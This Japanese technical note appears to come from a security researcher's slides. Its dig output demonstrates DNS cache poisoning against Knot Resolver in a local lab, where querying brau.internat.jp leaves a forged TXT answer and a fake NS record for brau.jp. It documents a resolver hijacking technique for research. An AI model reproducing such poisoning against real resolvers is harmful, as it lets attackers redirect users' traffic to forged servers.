1. DNS/KnotResolver/brau.internat.jp/brau.jpを乗取る/第二段/必要なかったケース/その2
1.1. 毒入れ
$ dig -t txt brau.internat.jp @127.0.0.1 ; <<>> DiG 9.16.1-Ubuntu <<>> -t txt brau.internat.jp @127.0.0.1 ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 8273 ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1 ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags:; udp: 4096 ;; QUESTION SECTION: ;brau.internat.jp. IN TXT ;; ANSWER SECTION: brau.internat.jp. 60 IN TXT "brau.internat.jp" ;; Query time: 19 msec ;; SERVER: 127.0.0.1#53(127.0.0.1) ;; WHEN: 日 8月 30 14:03:40 JST 2020 ;; MSG SIZE rcvd: 74
1.2. これだけで毒が見える
$ dig -t txt brau.jp @127.0.0.1 ; <<>> DiG 9.16.1-Ubuntu <<>> -t txt brau.jp @127.0.0.1 ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 59513 ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1 ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags:; udp: 4096 ;; QUESTION SECTION: ;brau.jp. IN TXT ;; ANSWER SECTION: brau.jp. 60 IN TXT "NG" ;; Query time: 11 msec ;; SERVER: 127.0.0.1#53(127.0.0.1) ;; WHEN: 日 8月 30 14:03:46 JST 2020 ;; MSG SIZE rcvd: 51 $ dig -t ns brau.jp @127.0.0.1 brau.jp. 300 IN NS fake.brau.jp.